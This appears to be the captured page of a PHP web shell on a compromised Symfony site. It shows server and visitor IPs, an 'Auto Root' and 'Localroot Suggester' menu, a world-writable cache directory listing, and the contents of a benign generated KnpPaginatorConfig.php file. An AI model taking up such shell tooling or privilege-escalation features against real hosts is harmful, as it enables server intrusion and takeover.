Linux unitednationsplay.com 3.10.0-1160.45.1.el7.x86_64 #1 SMP Wed Oct 13 17:20:51 UTC 2021 x86_64
nginx/1.20.1
Server IP : 188.130.139.92 & Your IP : 3.141.29.119
Domains :
Cant Read [ /etc/named.conf ]
User : web
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
home /
www /
wb /
var /
cache /
dev /
Symfony /
Config /
Delete
Unzip
Name
Size
Permission
Date
Action
Doctrine
[ DIR ]
drwxrwxrwx
2022-12-09 22:56
DoctrineMigrations
[ DIR ]
drwxrwxrwx
2022-12-09 22:56
FosJsRouting
[ DIR ]
drwxrwxrwx
2022-12-09 22:56
FosUser
[ DIR ]
drwxrwxrwx
2022-12-09 22:56
Framework
[ DIR ]
drwxrwxrwx
2022-12-09 22:56
JmsSerializer
[ DIR ]
drwxrwxrwx
2022-12-09 22:56
KnpPaginator
[ DIR ]
drwxrwxrwx
2022-12-22 17:25
Monolog
[ DIR ]
drwxrwxrwx
2022-12-09 22:56
Security
[ DIR ]
drwxrwxrwx
2022-12-09 22:56
SensioFrameworkExtra
[ DIR ]
drwxrwxrwx
2022-12-09 22:56
Swiftmailer
[ DIR ]
drwxrwxrwx
2022-12-09 22:56
Twig
[ DIR ]
drwxrwxrwx
2022-12-09 22:56
DebugConfig.php
4.43
KB
-rw-rw-rw-
2022-12-09 22:56
DoctrineConfig.php
3.28
KB
-rw-rw-rw-
2022-12-09 22:56
DoctrineMigrationsConfig.php
10.33
KB
-rw-rw-rw-
2022-12-09 22:56
FosJsRoutingConfig.php
4.58
KB
-rw-rw-rw-
2022-12-09 22:56
FosUserConfig.php
13.33
KB
-rw-rw-rw-
2022-12-09 22:56
FrameworkConfig.php
46.83
KB
-rw-rw-rw-
2022-12-09 22:56
JmsSerializerConfig.php
11.34
KB
-rw-rw-rw-
2022-12-09 22:56
KnpPaginatorConfig.php
4.93
KB
-rw-rw-rw-
2022-12-22 17:25
MakerConfig.php
1.46
KB
-rw-rw-rw-
2022-12-09 22:56
MonologConfig.php
3.57
KB
-rw-rw-rw-
2022-12-09 22:56
SecurityConfig.php
13.95
KB
-rw-rw-rw-
2022-12-09 22:56
SensioFrameworkExtraConfig.php
7.02
KB
-rw-rw-rw-
2022-12-09 22:56
SwiftmailerConfig.php
2.59
KB
-rw-rw-rw-
2022-12-09 22:56
TwigConfig.php
12.76
KB
-rw-rw-rw-
2022-12-09 22:56
WebProfilerConfig.php
2.87
KB
-rw-rw-rw-
2022-12-09 22:56
Save
Rename
<?php namespace Symfony\Config; require_once __DIR__.\DIRECTORY_SEPARATOR.'KnpPaginator'.\DIRECTORY_SEPARATOR.'DefaultOptionsConfig.php'; require_once __DIR__.\DIRECTORY_SEPARATOR.'KnpPaginator'.\DIRECTORY_SEPARATOR.'TemplateConfig.php'; use Symfony\Component\Config\Definition\Exception\InvalidConfigurationException; use Symfony\Component\Config\Loader\ParamConfigurator; /** * This class is automatically generated to help in creating a config. */ class KnpPaginatorConfig implements \Symfony\Component\Config\Builder\ConfigBuilderInterface { private $defaultOptions; private $template; private $pageRange; private $pageLimit; private $convertException; private $_usedProperties = []; public function defaultOptions(array $value = []): \Symfony\Config\KnpPaginator\DefaultOptionsConfig { if (null === $this->defaultOptions) { $this->_usedProperties['defaultOptions'] = true; $this->defaultOptions = new \Symfony\Config\KnpPaginator\DefaultOptionsConfig($value); } elseif (0 < \func_num_args()) { throw new InvalidConfigurationException('The node created by "defaultOptions()" has already been initialized. You cannot pass values the second time you call defaultOptions().'); } return $this->defaultOptions; } public function template(array $value = []): \Symfony\Config\KnpPaginator\TemplateConfig { if (null === $this->template) { $this->_usedProperties['template'] = true; $this->template = new \Symfony\Config\KnpPaginator\TemplateConfig($value); } elseif (0 < \func_num_args()) { throw new InvalidConfigurationException('The node created by "template()" has already been initialized. You cannot pass values the second time you call template().'); } return $this->template; } /** * @default 5 * @param ParamConfigurator|mixed $value * @return $this */ public function pageRange($value): self { $this->_usedProperties['pageRange'] = true; $this->pageRange = $value; return $this; } /** * @default null * @param ParamConfigurator|int $value * @return $this */ public function pageLimit($value): self { $this->_usedProperties['pageLimit'] = true; $this->pageLimit = $value; return $this; } /** * @default false * @param ParamConfigurator|bool $value * @return $this */ public function convertException($value): self { $this->_usedProperties['convertException'] = true; $this->convertException = $value; return $this; } public function getExtensionAlias(): string { return 'knp_paginator'; } public function __construct(array $value = []) { if (array_key_exists('default_options', $value)) { $this->_usedProperties['defaultOptions'] = true; $this->defaultOptions = new \Symfony\Config\KnpPaginator\DefaultOptionsConfig($value['default_options']); unset($value['default_options']); } if (array_key_exists('template', $value)) { $this->_usedProperties['template'] = true; $this->template = new \Symfony\Config\KnpPaginator\TemplateConfig($value['template']); unset($value['template']); } if (array_key_exists('page_range', $value)) { $this->_usedProperties['pageRange'] = true; $this->pageRange = $value['page_range']; unset($value['page_range']); } if (array_key_exists('page_limit', $value)) { $this->_usedProperties['pageLimit'] = true; $this->pageLimit = $value['page_limit']; unset($value['page_limit']); } if (array_key_exists('convert_exception', $value)) { $this->_usedProperties['convertException'] = true; $this->convertException = $value['convert_exception']; unset($value['convert_exception']); } if ([] !== $value) { throw new InvalidConfigurationException(sprintf('The following keys are not supported by "%s": ', __CLASS__).implode(', ', array_keys($value))); } } public function toArray(): array { $output = []; if (isset($this->_usedProperties['defaultOptions'])) { $output['default_options'] = $this->defaultOptions->toArray(); } if (isset($this->_usedProperties['template'])) { $output['template'] = $this->template->toArray(); } if (isset($this->_usedProperties['pageRange'])) { $output['page_range'] = $this->pageRange; } if (isset($this->_usedProperties['pageLimit'])) { $output['page_limit'] = $this->pageLimit; } if (isset($this->_usedProperties['convertException'])) { $output['convert_exception'] = $this->convertException; } return $output; } }